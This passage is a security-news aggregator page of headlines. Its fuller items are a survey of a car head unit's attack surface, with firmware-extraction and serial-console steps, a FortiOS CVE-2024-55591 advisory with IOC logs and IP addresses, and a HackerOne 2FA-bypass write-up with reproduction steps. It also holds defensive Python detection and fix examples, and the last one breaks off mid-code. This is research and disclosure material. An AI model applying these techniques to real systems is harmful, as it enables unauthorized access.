Security News
The latest news for cybersecurity collected from vast security websites.
2025-01-21 11:15:00
PNGPlug Loader Delivers ValleyRAT Malware Through Fake Software Installers
Cybersecurity researchers are calling attention to a series of cyber attacks that have targeted Chinese-speaking regions like Hong Kong, Taiwan, and Mainland China with a known malware called ValleyRAT. The attacks leverage a multi-stage loader dubbed PNGPlug to deliver the ValleyRAT payload, Intezer said in a technical report published last week. The infection chain commences with a phishing
by The Hacker News
2025-01-21 10:57:00
CERT-UA Warns of Cyber Scams Using Fake AnyDesk Requests for Fraudulent Security Audits
The Computer Emergency Response Team of Ukraine (CERT-UA) is warning of ongoing attempts by unknown threat actors to impersonate the cybersecurity agency by sending AnyDesk connection requests. The AnyDesk requests claim to be for conducting an audit to assess the "level of security," CERT-UA added, cautioning organizations to be on the lookout for such social engineering attempts that seek to
by The Hacker News
2025-01-21 05:30:09
Scam Yourself attacks: How social engineering is evolving
We’ve entered a new era where verification must come before trust, and for good reason. Cyber threats are evolving rapidly, and one of the trends getting a fresh reboot in 2025 is the “scam yourself” attack. These aren’t your run-of-the-mill phishing scams. They are a sophisticated evolution of social engineering designed to deceive even the most tech-savvy users. Attackers exploit our routines, trust, overconfidence, and complacency to manipulate us into becoming unwitting accomplices in …
by Help Net Security
2025-01-21 05:00:10
Addressing the intersection of cyber and physical security threats
In this Help Net Security interview, Nicholas Jackson, Director of Cyber Operations at Bitdefender, discusses how technologies like AI, quantum computing, and IoT are reshaping cybersecurity. He shares his perspective on the new threats these advancements bring and offers practical advice for organizations to stay prepared. What emerging technologies or trends could introduce entirely new types of cybersecurity threats? Emerging technologies such as AI, quantum computing, and IoT are reshaping the cybersecurity landscape. AI enables adversaries …
by Help Net Security
2025-01-21 04:30:41
Fleet: Open-source platform for IT and security teams
Fleet is an open-source platform for IT and security teams managing thousands of computers. It’s designed to work seamlessly with APIs, GitOps, webhooks, and YAML configurations. Fleet provides a single platform to secure and maintain all computing devices over the air. It offers a centralized solution, from mobile device management (MDM) to patching and verifying systems. It’s trusted in production environments. Deployments range from tens of thousands of hosts to large-scale environments supporting over 400,000 …
by Help Net Security
2025-01-21 04:00:17
Cybersecurity jobs available right now: January 21, 2025
CISO, Sempra Infrastructure | USA | Hybrid: As a CISO, you will develop and implement a robust information security strategy and program that aligns with the organization’s objectives and regulatory requirements. Assess and manage cybersecurity risks across the organization’s digital infrastructure, networks, and sensitive data. Implement risk mitigation strategies and ensure regular risk assessments and audits.
Cloud Security Engineer, UBX | Philippines | On-site: As a Cloud …
by Help Net Security
2025-01-20 23:59:00
Last Week in Security (LWiS) - 2025-01-20
Windows LPE (@MrAle_98), CLR OPSEC (@passthehashbrwn), WinRM BOFs (@falconforceteam), Bitlocker bypass (@Neodyme), BloodHound CLI (@cmaddalena), and more!
by Bad Sector Labs
2025-01-20 22:46:25
HPE is investigating IntelBroker’s claims of the company hack
HPE is probing claims by the threat actor IntelBroker, who is offering to sell source code and data allegedly stolen from the company. Last week, the notorious threat actor IntelBroker announced on a popular cybercrime forum the sale of data allegedly stolen from HPE. IntelBroker, known for leaking data from major organizations, made the headlines […]
by Security Affairs
2025-01-20 20:38:00
Unsecured Tunneling Protocols Expose 4.2 Million Hosts, Including VPNs and Routers
New research has uncovered security vulnerabilities in multiple tunneling protocols that could allow attackers to perform a wide range of attacks. "Internet hosts that accept tunneling packets without verifying the sender's identity can be hijacked to perform anonymous attacks and provide access to their networks," Top10VPN said in a study, as part of a collaboration with KU Leuven professor
by The Hacker News
2025-01-20 20:35:17
Experts found new DoNot Team APT group’s Android malware
Researchers linked the threat actor DoNot Team to a new Android malware that was employed in highly targeted cyber attacks. CYFIRMA researchers linked a recently discovered Android malware to the Indian APT group known as DoNot Team. The DoNot Team (aka APT-C-35 and Origami Elephant) has been active since 2016; it focuses on government and military organizations, […]
by Security Affairs
2025-01-20 20:23:00
DoNot Team Linked to New Tanzeem Android Malware Targeting Intelligence Collection
The threat actor known as DoNot Team has been linked to a new Android malware as part of highly targeted cyber attacks. The artifacts in question, named Tanzeem (meaning "organization" in Urdu) and Tanzeem Update, were spotted in October and December 2024 by cybersecurity company Cyfirma. The apps in question have been found to incorporate identical functions, barring minor modifications to the
by The Hacker News
2025-01-20 18:50:06
Ukraine restores state registers after suspected Russian cyberattack
Ukraine has restored the infrastructure of its state registers, which were disrupted last month by a major cyberattack believed to have been carried out by Russian military intelligence hackers.
by The Record
2025-01-20 18:16:08
Belsen Group Leaks 15,000+ FortiGate Firewall Configurations
FortiGate firewall leak exposes 15,000+ configurations, impacting organizations globally. The actor behind the leak is Belsen Group. Learn…
by Hackread
2025-01-20 17:32:00
⚡ THN Weekly Recap: Top Cybersecurity Threats, Tools and Tips [20 January]
As the digital world becomes more complicated, the lines between national security and cybersecurity are starting to fade. Recent cyber sanctions and intelligence moves show a reality where malware and fake news are used as tools in global politics. Every cyberattack now seems to have deeper political consequences. Governments are facing new, unpredictable threats that can't be fought with
by The Hacker News
2025-01-20 17:17:37
Industry Moves for the week of January 20, 2025 - SecurityWeek
Explore industry moves and significant changes in the industry for the week of January 20, 2025. Stay updated with the latest industry trends and shifts.
by SecurityWeek
2025-01-20 17:04:13
Name That Toon: Incentives
Feeling creative? Have something to say about cybersecurity? Submit your caption and our panel of experts will reward the winner with a $25 gift card.
by Dark Reading
2025-01-20 17:01:00
Washington Man Admits to Role in Multiple Cybercrime, Fraud Schemes
Marco Raquan Honesty has pleaded guilty to his roles in several fraud schemes, including smishing, identity theft, and bank account takeover.
by SecurityWeek
2025-01-20 16:53:32
🐝 Hive Five 207 - Brain Rot and One Man Armies
Editing with LLMs, 80% faster Ax framework, AI-first Director of Finance, Obsidian 2024 Gems of the Year Voting, 8 Lessons from Red Teaming 100 Gen AI Products, The Big Ass Data Broker Opt-Out List, and more...
by Hive Five
2025-01-20 16:40:00
Product Walkthrough: How Satori Secures Sensitive Data From Production to AI
Every week seems to bring news of another data breach, and it’s no surprise why: securing sensitive data has become harder than ever. And it’s not just because companies are dealing with orders of magnitude more data. Data flows and user roles are constantly shifting, and data is stored across multiple technologies and cloud environments. Not to mention, compliance requirements are only getting
by The Hacker News
2025-01-20 16:39:46
Malicious VPN Extensions Found Spying on Chrome Users
A new investigation by security researcher Wladimir Palant reveals that malicious VPN extensions on the Chrome Web Store are using obfuscation techniques to bypass Google's remote code execution restrictions. These extensions secretly collect browsing data, manipulate user traffic, and employ anti-debugging measures to evade detection. Intrusive VPN extensions: Palant found that 32 VPN extensions rely …
by Cyber Insider
2025-01-20 16:29:18
New AiTM PhaaS Platform ‘Sneaky 2FA’ Targets Microsoft 365 Accounts
A newly identified Adversary-in-the-Middle (AiTM) phishing kit, dubbed Sneaky 2FA, is being distributed as a Phishing-as-a-Service (PhaaS) operation on Telegram, enabling cybercriminals to bypass multi-factor authentication (MFA) protections for Microsoft 365 accounts. Sekoia’s Threat Detection & Research (TDR) team discovered the phishing kit in December 2024 during routine threat-hunting activities and has since linked it …
by Cyber Insider
2025-01-20 16:20:07
Flaw in ChatGPT API Allows Powerful Reflective DDoS Attacks
A newly disclosed vulnerability in OpenAI's ChatGPT API allows attackers to trigger Distributed Denial-of-Service (DDoS) attacks against arbitrary websites using OpenAI's own infrastructure. The flaw enables an unauthenticated attacker to overwhelm a target website with HTTP requests originating from OpenAI's Microsoft Azure-hosted servers. OpenAI, a leading artificial intelligence research organization, operates ChatGPT, one of the …
by Cyber Insider
2025-01-20 16:00:00
Attack Tactics 9: Shadow Creds for PrivEsc w/ Kent & Jordan
In this video, Kent Ickler and Jordan Drysdale discuss Attack Tactics 9: Shadow Credentials for Primaries, focusing on a specific technique used in penetration testing services at Black Hills Information Security.
by Black Hills Information Security
2025-01-20 16:00:00
Looking at the Attack Surfaces of the Pioneer DMH-WT7600NEX IVI
For the upcoming Pwn2Own Automotive contest, a total of four in-vehicle infotainment (IVI) head units have been selected as targets. One of these is the single-DIN Pioneer DMH-WT7600NEX. This unit offers a variety of functionality, such as wired and wireless Android Auto and Apple CarPlay, USB media playback, and more. This blog post aims to detail some of the attack surfaces of the DMH-WT7600NEX unit as well as provide information on how to extract the software running on this unit for further vulnerability research.

Software Extraction
The initial effort to locate a serial console in the hope of easy software extraction bore no fruit. This left only a handful of options:
· Work with the software update package instead. However, the package was found to be encrypted, making this approach a dead end initially; more on that below.
· Attempt to desolder the eMMC chip and dump its contents using a programmer. This necessitates reballing and resoldering the eMMC chip, which is risky without proper SMD rework equipment.
· Attempt to extract eMMC contents in-system. This does not require any SMD rework, but the signal locations must be known, and the system must be powered and held in reset while dumping is in progress.
The researchers chose the last option. Connecting to the eMMC chip could be performed via (thankfully labeled) test points on the board. The missing MMC_CLK signal was probed for using an oscilloscope; here is where it was found after numerous attempts. In addition to that, the main SoC was held in reset by pulling the test point labelled RSTN to ground via a 220 Ohm resistor and a switch.
Note that when the SoC is held in reset, the 3.3V power line is cycled periodically by some other component, which powers off the eMMC chip. This is likely some watchdog component attempting to bring the system out of a hung state. Finding that component and persuading it not to do that was deemed too time consuming, and the 3.3V power rail was instead powered directly through a bench power supply.

Data at Rest
After the eMMC chip was successfully “backed up,” it was time for Trend ZDI researchers to have a look at the 8 gigabytes of its contents. The image was found to sport a GPT partition table, with the following partitions defined after mounting the image via the loopback interface on a test system:
There are two sets of bootable images, consisting of the header, boot, system, dtb, hirtos, bootloader, chips, and backup partitions. It is likely this is to safeguard against failed software updates, so there is a known good set of bootable images. Let’s have a closer look at what is contained in each partition:
· The header partition contains what looks to be a description of the other partitions in the set.
· The bootloader partition contains the bootloader as described, which seems to be a version of fastboot.
· The boot partition contains the Android/Linux kernel version 3.18.24.
· The dtb partition contains the DTB blob as described.
· The system partition contains the root file system.
· The hirtos partition contains a firmware image with ARM instructions. The exact purpose of this code is not currently known. The image consists of several chunks of code/data; some of it is obvious ARM code while others appear to be bitmap images. The following string was found inside the first chunk: “T-Monitor/triton_TCC897x Version 2.01.00”. This suggests the code is to be executed on the main SoC but likely on a separate core.
· The chips partition contains the firmware for the GNSS daughter board.
· The backup partition contains some kind of binary data, rather sparsely organized.
Interestingly enough, the system itself appears to be a Linux-based one; none of the typical Android infrastructure could be located there. All the custom software is concentrated in /usr/local/ subdirectories.

Software Updates
Obtaining an image of the code running on the device allowed a second look at the software update format. The latest update file can be obtained from the manufacturer; unfortunately, they do not seem to list previous versions. This is justified, as downgrading the software is not officially supported anyway—as the team found out firsthand.
The software update package is structured like this:
· A header of 0x100 bytes describing the file, specifically the header size and the total size of the image, the software version in this update, plus which model the update is for.
· An RSA signature block of 0x100 bytes, which can be verified by a certain public key hardcoded in the software. The signature covers the described header only.
· An RSA signature block of 0x100 bytes, which can be decrypted by the same key, and which carries an AES-256 key instead of the digest.
· Update data, encrypted with AES-256-CBC using the all-zero IV. This decrypts into a gzipped “raw” update image.
The raw update image in turn consists of headers very similar to what can be found in the header partitions, followed by a series of images for each partition mentioned in the headers. The image(s) can be processed further to extract the content of interest, like the root file system.

Serial Console
Armed with some knowledge of the unit’s software, it was time to revisit the search for the serial console.
By studying the contents of the bootloader partitions, Trend ZDI researchers discovered the bootloader may use values from the backup partitions to decide which values to pass via the `console` and `login` kernel parameters, among other things. Specifically, the sector at byte offset 0x800800 contains that data. The format this data is in can be reverse engineered both from the bootloader and from the NPSystemDebug class implementation. Notably, it appears that manipulation of these values could be performed via the UI, as the code flow can be traced all the way to the `UI_UIEB_MM_99_018` class, which implements two buttons changing the state of the values. However, at the moment of writing it was unknown how to reach that specific UI screen.
Thus, direct manipulation of the flags was chosen instead. The contents of the backup partition were altered to enable both the serial console and the login prompt. After probing the board connectors for any semblance of serial data, it was discovered on CN3603 pin 7. Connecting a UART-to-USB dongle to that pin confirmed that indeed, console output is present, as well as the login prompt. Only three signals are routed to that connector; however, the RX signal was not immediately identified among those.
Studying the bottom layer of the board showed a single installed passive among several missing ones; this was one resistor pulling up a line otherwise not connected to any connector pin. Probing that line for being the missing RX line resulted in a success. Likely, one of the missing passives should connect that line to a connector pin. Now it was possible to communicate with the device—and log in locally. Having console access is always a big boon in vulnerability research.

Bluetooth
The vendor lists the following supported Bluetooth profiles:
· Advanced Audio Distribution Profile (A2DP)
· Hands-Free Profile
· Serial Port Profile
· Audio/Video Remote Control Profile (AVRCP) v1.6
Given the rich history of bugs in Bluetooth-related functionality, this could be an interesting attack vector.

Wi-Fi
The unit can be set up in both the client and access point modes for Wi-Fi. When in the AP mode, the unit allows using the WPS setup in addition to entering the PSK. This could potentially be an interesting attack angle, as WPS flows were historically weak to attacks.
After connecting to the unit in AP mode and running a network scan, the following TCP ports were found to be open: 5000, 38000, 38001, 42000, 43000, and 60000. An Nmap script scan only showed that port 5000 uses TLS with a self-signed certificate; other services were not recognized. Using the console access, it is possible to map out the open ports to the corresponding processes (only ports allowed through the iptables rules are shown here for brevity):
Given the abundance of what looks like non-standard services, Wi-Fi connectivity presents a potentially rewarding target for vulnerability research.

USB
The unit is equipped with a single USB-C port that provides the necessary interface for wired Android Auto and Apple CarPlay. The USB port also supports playback of audio files from a USB flash drive. The supported audio filetypes are:
· MP3
· WMA
· WAV
· AAC
· FLAC
· DSD
The unit also supports video playback with the following formats listed as supported:
· AVI
· MPEG
· DivX
· MP4
· 3GP
· MKV
· FLV
· WMV/ASF
· M4V
· H.263, H.264
In addition, it is also possible to view images in BMP, JPEG, and PNG formats. Parsing complex file formats is error-prone and has been a rich source of exploitable bugs since time immemorial.

Android Auto and Apple CarPlay
Both wired and wireless Android Auto and Apple CarPlay are supported without the need for a third-party application to be installed on the paired mobile phone. When using the wireless versions, the paired phone connects to the aforementioned Wi-Fi network to establish a high-bandwidth channel for data to be sent and received. When connecting using a USB cable, the Wi-Fi network isn't used by Android Auto or Apple CarPlay and can be disabled in Settings. As evidenced above, the `Media` process is likely responsible for handling both.
Pwn2Own Automotive 2024 didn’t see any entries that leveraged Android Auto or Apple CarPlay functionality to compromise a head unit. We will have to wait and see if Pwn2Own Automotive 2025 does!

Summary
We hope that this blog post has provided enough information about the Pioneer DMH-WT7600NEX attack surface to guide vulnerability research. Not every attack surface has been mentioned, and we encourage researchers to investigate further. We are looking forward to Automotive Pwn2Own, again to be held in January 2025 at the Automotive World conference in Tokyo. We will see if IVI vendors have improved their product security. Don’t wait until the last minute to ask questions or register! We hope to see you there.
You can find me on Mastodon at @InfoSecDJ, and follow the team on Twitter, Mastodon, LinkedIn, or Bluesky for the latest in exploit techniques and security patches.
by Zero Day Initiative Blog
2025-01-20 15:48:07
Philippines arrests Chinese national suspected of spying on critical infrastructure
Philippine authorities have arrested a Chinese national and two Filipino citizens suspected of conducting surveillance on critical infrastructure, including military facilities, the country’s National Bureau of Investigation (NBI) said on Monday.
by The Record
2025-01-20 15:46:24
Fortinet Zero-Day CVE-2024-55591 Exposed: Super-Admin Access Risk

Overview
Fortinet, a global leader in cybersecurity solutions, recently released a critical advisory addressing a significant vulnerability (CVE-2024-55591) in its FortiOS and FortiProxy products. This flaw, which has a CVSSv3 score of 9.6, is categorized as a critical authentication bypass vulnerability and is currently being exploited in the wild. Attackers leveraging this vulnerability can potentially gain super-admin privileges by exploiting weaknesses in the Node.js WebSocket module, making this a high-stakes issue for organizations relying on Fortinet's products. This blog provides a detailed overview of the vulnerability, affected versions, Indicators of Compromise (IOCs), mitigation strategies, and steps for administrators to protect their systems effectively.

The Vulnerability Explained
The CVE-2024-55591 vulnerability stems from an "Authentication Bypass Using an Alternate Path or Channel" issue (CWE-288). An attacker can craft malicious requests to the Node.js WebSocket module, bypass authentication, and gain unauthorized super-admin access. Once exploited, the attacker can perform a wide range of malicious activities, including:
Creating administrative or local user accounts.
Modifying firewall policies, addresses, or system settings.
Establishing Secure Sockets Layer Virtual Private Network (SSL VPN) tunnels to access internal networks.

Affected Products and Versions
The vulnerability impacts the following versions of FortiOS and FortiProxy products:
FortiOS: Versions 7.0.0 through 7.0.16 are affected. Versions 7.6, 7.4, and 6.4 are not affected.
FortiProxy: Versions 7.0.0 through 7.0.19 and versions 7.2.0 through 7.2.12 are affected. Versions 7.6 and 7.4 are not affected.
Solution: Upgrade FortiOS to version 7.0.17 or later. Upgrade FortiProxy to version 7.0.20 or 7.2.13 or later.

How Attackers Exploit the Vulnerability
Attackers exploit this vulnerability by sending malicious WebSocket requests to bypass authentication controls. They can target administrative accounts by guessing or brute-forcing usernames. Once access is gained, they perform the following malicious actions:
Create random user accounts such as "Gujhmk" or "M4ix9f".
Add these accounts to administrative or VPN groups.
Use SSL VPN connections to infiltrate the internal network.

Indicators of Compromise (IOCs)
Fortinet has shared some key IOCs that organizations should monitor to identify potential attacks.
Log Entries
Look for the following types of suspicious log entries in your system:
Successful Admin Logins:
type="event" subtype="system" level="information" logdesc="Admin login successful" user="admin" ui="jsconsole" srcip=1.1.1.1 dstip=1.1.1.1 action="login" status="success" msg="Administrator admin logged in successfully from jsconsole"
Unauthorized Configuration Changes:
type="event" subtype="system" level="information" logdesc="Object attribute configured" user="admin" ui="jsconsole(127.0.0.1)" action="Add" msg="Add system.admin vOcep"
Suspicious IP Addresses
Attackers have been observed using the following IP addresses to launch attacks:
45.55.158.47 (most commonly used)
87.249.138.47
155.133.4.175
37.19.196.65
149.22.94.37
It’s important to note that these IP addresses are not fixed sources of attack traffic; they are often spoofed and may not represent the actual origin.

Recommended Actions
1. Update Immediately
If your organization is using affected versions of FortiOS or FortiProxy, the most effective solution is to upgrade to the latest secure versions. Fortinet has provided tools to assist with upgrading, which can be found on their official site.
2. Mitigations for Immediate Protection
If an upgrade cannot be performed immediately, consider implementing the following mitigations:
Disable HTTP/HTTPS Administrative Interfaces: This reduces the exposure of management interfaces to the internet.
Restrict Access with Local-In Policies: Limit access to the administrative interface by allowing only trusted IPs.
Use Non-Standard Admin Usernames: To make brute-force attacks more difficult, avoid predictable or default usernames for administrative accounts.

Exploitation in the Wild
Reports indicate active exploitation of this vulnerability. Threat actors have been observed creating random administrative or local user accounts, such as:
Gujhmk
Ed8x4k
Alg7c4
These accounts are often added to SSL VPN user groups to establish tunnels into internal networks, making it critical to monitor for unauthorized account creation.

Best Practices for Enhanced Security
Enable Logging and Monitoring: Continuously monitor system logs for any unauthorized administrative activity, suspicious configuration changes, or unexpected VPN connections.
Conduct Regular Vulnerability Scans: Perform routine scans to identify and patch other vulnerabilities within your network infrastructure.
Adopt a Zero Trust Approach: Limit user privileges to the minimum required and enforce strict access controls, especially for administrative tasks.
Educate Your Team: Ensure that your IT and security teams are aware of this vulnerability and trained to respond to potential threats.
Implement Multi-Factor Authentication (MFA): Although this vulnerability bypasses traditional authentication, MFA adds an additional layer of security that can mitigate other attack vectors.

Conclusion
The CVE-2024-55591 vulnerability emphasizes the critical need for organizations to stay ahead of emerging threats. With attackers actively exploiting this flaw to gain super-admin access, the risks to your infrastructure and data cannot be overstated. Organizations using FortiOS and FortiProxy must act immediately. Patching systems and implementing mitigations isn’t optional; it’s imperative. It’s not just about reacting to vulnerabilities—it’s about adopting a proactive and layered approach to cybersecurity. Leveraging tools like multi-factor authentication, real-time log monitoring, and Zero-Trust architectures can significantly reduce the risk of exploitation. The broader lesson here is clear: vulnerabilities are inevitable, but breaches don’t have to be. By staying informed, investing in advanced threat detection systems, and fostering a security-first mindset within your organization, you can not only address immediate threats but also build resilience against future ones. As cyber threats grow more advanced, are you prepared to meet them head-on? Strengthening your defenses today will determine your security tomorrow. Let this be a reminder to continuously innovate and adapt in the face of an ever-changing threat landscape. Your next step could define the safety of your organization.
Source:
https://www.csa.gov.sg/alerts-advisories/alerts/2025/al-2025-004
https://www.fortiguard.com/psirt/FG-IR-24-535
https://nvd.nist.gov/vuln/detail/CVE-2024-55591
by CYBLE
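A detection example for the log entries quoted in the Cyble advisory above, added here and not part of Cyble's or Fortinet's material: it parses FortiOS key=value log lines and flags the jsconsole admin logins, system.admin additions and IOC source addresses the advisory describes. The three sample log lines and the 198.51.100.7 and 203.0.113.10 addresses are constructed for the demonstration.

```python
import re
from typing import Dict, List

# Source IPs listed in the advisory. Treated as a weak indicator on its own,
# because the same advisory notes the addresses are often spoofed.
IOC_SRC_IPS = {
    "45.55.158.47", "87.249.138.47", "155.133.4.175",
    "37.19.196.65", "149.22.94.37",
}

# FortiOS event logs are key=value pairs; values are double-quoted or bare.
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_fortios_log(line: str) -> Dict[str, str]:
    """Split one FortiOS log line into a field dictionary."""
    fields: Dict[str, str] = {}
    for key, quoted, bare in KV_RE.findall(line):
        fields[key] = quoted if quoted else bare
    return fields


def analyze_line(line: str) -> List[str]:
    """Return the reasons a line matches the advisory's log IOCs (empty if none)."""
    f = parse_fortios_log(line)
    findings: List[str] = []
    if f.get("type") != "event" or f.get("subtype") != "system":
        return findings
    ui = f.get("ui", "")
    msg = f.get("msg", "")
    # 1. Successful admin login whose UI is jsconsole instead of https/ssh.
    if f.get("logdesc") == "Admin login successful" and ui.startswith("jsconsole"):
        findings.append(f"admin login through jsconsole by user {f.get('user', '?')}")
    # 2. A system.admin object added through jsconsole: the account-creation
    #    step the advisory describes (random names such as Gujhmk or vOcep).
    if (f.get("logdesc") == "Object attribute configured"
            and f.get("action") == "Add"
            and ui.startswith("jsconsole")
            and msg.startswith("Add system.admin ")):
        findings.append(f"new admin account added via jsconsole: {msg.split()[-1]}")
    # 3. Source address in the advisory's IOC list.
    if f.get("srcip") in IOC_SRC_IPS:
        findings.append(f"srcip {f['srcip']} is in the advisory IOC list")
    return findings


def scan(lines: List[str]) -> Dict[int, List[str]]:
    """Run analyze_line over a batch; keys are the indexes of lines that matched."""
    result: Dict[int, List[str]] = {}
    for i, line in enumerate(lines):
        hits = analyze_line(line)
        if hits:
            result[i] = hits
    return result


# Constructed sample log lines modelled on the two formats quoted in the advisory.
SAMPLE_LOGS = [
    'type="event" subtype="system" level="information" logdesc="Admin login successful" '
    'user="admin" ui="jsconsole" srcip=45.55.158.47 dstip=203.0.113.10 action="login" '
    'status="success" msg="Administrator admin logged in successfully from jsconsole"',
    'type="event" subtype="system" level="information" logdesc="Object attribute configured" '
    'user="admin" ui="jsconsole(127.0.0.1)" action="Add" msg="Add system.admin vOcep"',
    # Benign: an ordinary admin login over HTTPS from an internal address.
    'type="event" subtype="system" level="information" logdesc="Admin login successful" '
    'user="admin" ui="https(198.51.100.7)" srcip=198.51.100.7 dstip=203.0.113.10 '
    'action="login" status="success" msg="Administrator admin logged in successfully '
    'from https(198.51.100.7)"',
]

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_LOGS).items():
        print(f"line {idx}: " + "; ".join(reasons))
```

Feed real FortiOS event logs into scan() one line per element; a jsconsole login or system.admin addition is worth investigating even when the source address is not on the IOC list.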
2025-01-20 15:29:25
Forward-Thinking Industry Leaders Sponsor Most Inspiring Women in Cyber Awards 2025
Eskenzi PR are proud to announce that KnowBe4, Mimecast, Varonis, Bridewell, Certes, and Pentest Tools have joined BT as sponsors for this year’s Most Inspiring Women in Cyber Awards. The 5th annual event, held at the iconic BT Tower on the 26th February 2025, aims to celebrate trailblazers from across the cybersecurity industry who are […]
by IT Security Guru
2025-01-20 15:22:23
How I found S3 buckets in Bug bounties
Cloud enumeration and exploitation
by InfoSec Write-ups
2025-01-20 15:20:25
Bypass HackerOne 2FA requirement and reporter blacklist

Severity: Medium (5.0) — High (7.1)
Weakness: Improper Authorization
Bounty: $10,000

Summary:
First, the initial submission got a bounty of $2,500. But while HackerOne was doing their Root Cause Analysis (RCA) of my report submission, they stumbled upon another vulnerability with High severity. Since my submission gave them a nudge in the right direction, they rewarded me another $7,500 for the increased scope of the finding.

Research:
My routine when I am hunting on the HackerOne main platform is always checking if they have a new incoming feature, and I saw that there is a beta feature called Embedded Submission Form which enables hackers to anonymously submit reports without having to create an account on HackerOne. For additional information, learn more here.

Now, with that new feature I found an Improper Authorization bug that bypasses two security features of HackerOne for bug bounty programs:
- Bypass 2FA requirements when submitting new reports to a program. Learn more here.
- Bypass hacker blacklisting by a program (when a program does not want to receive reports from specific hackers). Learn more here.

Bypass 2FA requirements when submitting new reports to a program
A program owner can enforce that hackers set up two-factor authentication before submitting new reports to their program here: https://hackerone.com/<program>/submission_requirements (see below image)
[Image: Enabled 2FA requirements]
The Parrot Sec program has this feature enabled to enforce that hackers set up 2FA before submitting reports. I removed the 2FA on my account to test, and it is good that I was blocked from submitting new reports (see below image).
[Image: 2FA required by the program before submitting new reports.]
Now I was able to bypass this 2FA setup requirement by using the Parrot Sec program Embedded Submission Form.

Steps to reproduce:
1. Log in to your account and remove the 2FA on your account (if you already set it up).
2. Now go to https://hackerone.com/parrot_sec and hit the Submit Report button; observe that you cannot submit a report unless you enable your 2FA.
3. BYPASS: Get the Embedded Submission URL on their policy page. I got this: https://hackerone.com/<redacted_UUID>/embedded_submissions/new
4. Now submit a report using that embedded submission form, and you can submit reports without setting up your 2FA, despite the program enforcing that the user set up 2FA before submitting new reports.
2FA requirements successfully bypassed!

Impact
Users can still submit a report to a program despite the program owner requiring 2FA enabled on the account before a hacker can submit reports.

Bypass Hacker Blacklisted to a program
If a hacker’s behavior is out of sync with what is outlined on the bug bounty program’s Security Page, or if they’ve violated part of the HackerOne Code of Conduct, program owners can take action to ban hackers from participating in their program. BBP program owners can ban hackers from both private and public programs (see below image). For additional information, learn more here.
[Image: Program blacklisting hackers.]
So I asked a good friend of mine, Ace Candelario (phspade), to ban my h1/japz account on the HackerOne Parrot Sec program from submitting a new report; btw he is the Philippine Ambassador of Parrot Security and one of the triagers in the Parrot Sec HackerOne program. After banning my account I tried to submit a report, and clicking on the Submit Report button redirected me to a Page Not Found error page (see below).
[Image: Error page when you are banned from a specific program and try to submit a report.]
It’s good; the reason why I cannot submit a new report is because I am banned/blacklisted on the Parrot Sec program. :)
But using the same steps to reproduce as in my first bypass above (Bypassing 2FA requirements), I was able to submit a new report to the BBP program despite already being banned.

Impact
A malicious user can still submit as many reports as he/she wants despite the program owner having banned/blacklisted the hacker.

Note: This second bypass turned out to have the same root cause as the first bypass above, therefore it was closed as a duplicate of my first report #418767. HackerOne Co-Founder Jobert closed the report as a duplicate because it has the same root cause as the first bug mentioned above.

Disclosure Timeline
2018-10-04 02:41:19 — Report submitted to HackerOne security team.
2018-10-05 20:07:59 — Security team acknowledged and triaged the report.
2018-10-05 20:53:21 — $10,000 bounty rewarded.
2018-10-06 00:38:15 — Fix for the High severity bug released to production, while the fix for the initial submission (Medium) was still ongoing.
2018-10-25 23:11:03 — Fix for the Medium severity bug that was initially reported released to production.
2018-10-25 23:11:03 — Status: Resolved

Original submission reference: Hacker can bypass 2FA requirement and reporter blacklist through embedded submission form

Shout-out to all Pinoy Bug Bounty Hunters out there! :)
Cheers!
Japz
https://twitter.com/japzdivino
https://instagra
https://www.facebook.com/pinoywhitehat
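As an added example (not HackerOne's code), the root cause the two bypasses share, modelled in Python: one submission-requirements check (2FA required, reporter banned) that the standard form ran and the embedded form did not, beside a dispatcher that runs the same check in front of every entry point. Program and reporter names are constructed, and treating an anonymous embedded submitter as unable to satisfy reporter requirements is an assumption, not something the write-up states.

```python
"""Two entry points, one policy: the shape of the bug and of its fix."""
from dataclasses import dataclass
from typing import Callable, Optional


@dataclass(frozen=True)
class Program:
    handle: str                      # constructed, e.g. "example_program"
    require_2fa: bool = False        # the submission_requirements toggle
    banned_reporters: frozenset = frozenset()   # the program's blacklist


@dataclass(frozen=True)
class Reporter:
    # None models an anonymous embedded-form submitter with no HackerOne account.
    handle: Optional[str]
    has_2fa: bool = False


class SubmissionDenied(Exception):
    """Raised when a program's submission requirements are not met."""


def check_submission_requirements(program: Program, reporter: Reporter) -> None:
    """The single policy check every entry point must run.

    Assumption: when a program enforces reporter requirements, an anonymous
    reporter cannot satisfy them, so the submission is denied.
    """
    if reporter.handle is None:
        if program.require_2fa or program.banned_reporters:
            raise SubmissionDenied("program requirements need an identified reporter")
        return
    if reporter.handle in program.banned_reporters:
        raise SubmissionDenied(f"{reporter.handle} is banned from {program.handle}")
    if program.require_2fa and not reporter.has_2fa:
        raise SubmissionDenied(f"{program.handle} requires 2FA before submitting")


def _store_report(program: Program, reporter: Reporter, title: str) -> dict:
    # Stand-in for persisting the report; returns a receipt.
    return {"program": program.handle, "reporter": reporter.handle, "title": title}


# --- Vulnerable shape: each entry point decides on its own whether to check ---

def submit_standard_form(program: Program, reporter: Reporter, title: str) -> dict:
    check_submission_requirements(program, reporter)
    return _store_report(program, reporter, title)


def submit_embedded_form_vulnerable(program: Program, reporter: Reporter, title: str) -> dict:
    # The new feature shipped without the check: this is the bypass.
    return _store_report(program, reporter, title)


# --- Hardened shape: the check runs once, in front of every entry point ---

_ENTRY_POINTS: dict[str, Callable[[Program, Reporter, str], dict]] = {
    "standard": _store_report,
    "embedded": _store_report,
}


def submit(path: str, program: Program, reporter: Reporter, title: str) -> dict:
    """Dispatch to any submission path only after the shared check passes."""
    if path not in _ENTRY_POINTS:
        raise ValueError(f"unknown submission path: {path}")
    check_submission_requirements(program, reporter)
    return _ENTRY_POINTS[path](program, reporter, title)


def paths_disagree(program: Program, reporter: Reporter) -> bool:
    """Regression check: True when the vulnerable embedded path accepts a
    submission the standard path rejects, i.e. the write-up's bug."""
    try:
        submit_standard_form(program, reporter, "probe")
        return False            # both paths accept; nothing to bypass
    except SubmissionDenied:
        pass
    try:
        submit_embedded_form_vulnerable(program, reporter, "probe")
        return True
    except SubmissionDenied:
        return False


if __name__ == "__main__":
    prog = Program("example_program", require_2fa=True,
                   banned_reporters=frozenset({"banned_user"}))
    no_2fa = Reporter("reporter_without_2fa", has_2fa=False)
    print("vulnerable embedded path disagrees with policy:", paths_disagree(prog, no_2fa))
    try:
        submit("embedded", prog, no_2fa, "probe")
    except SubmissionDenied as exc:
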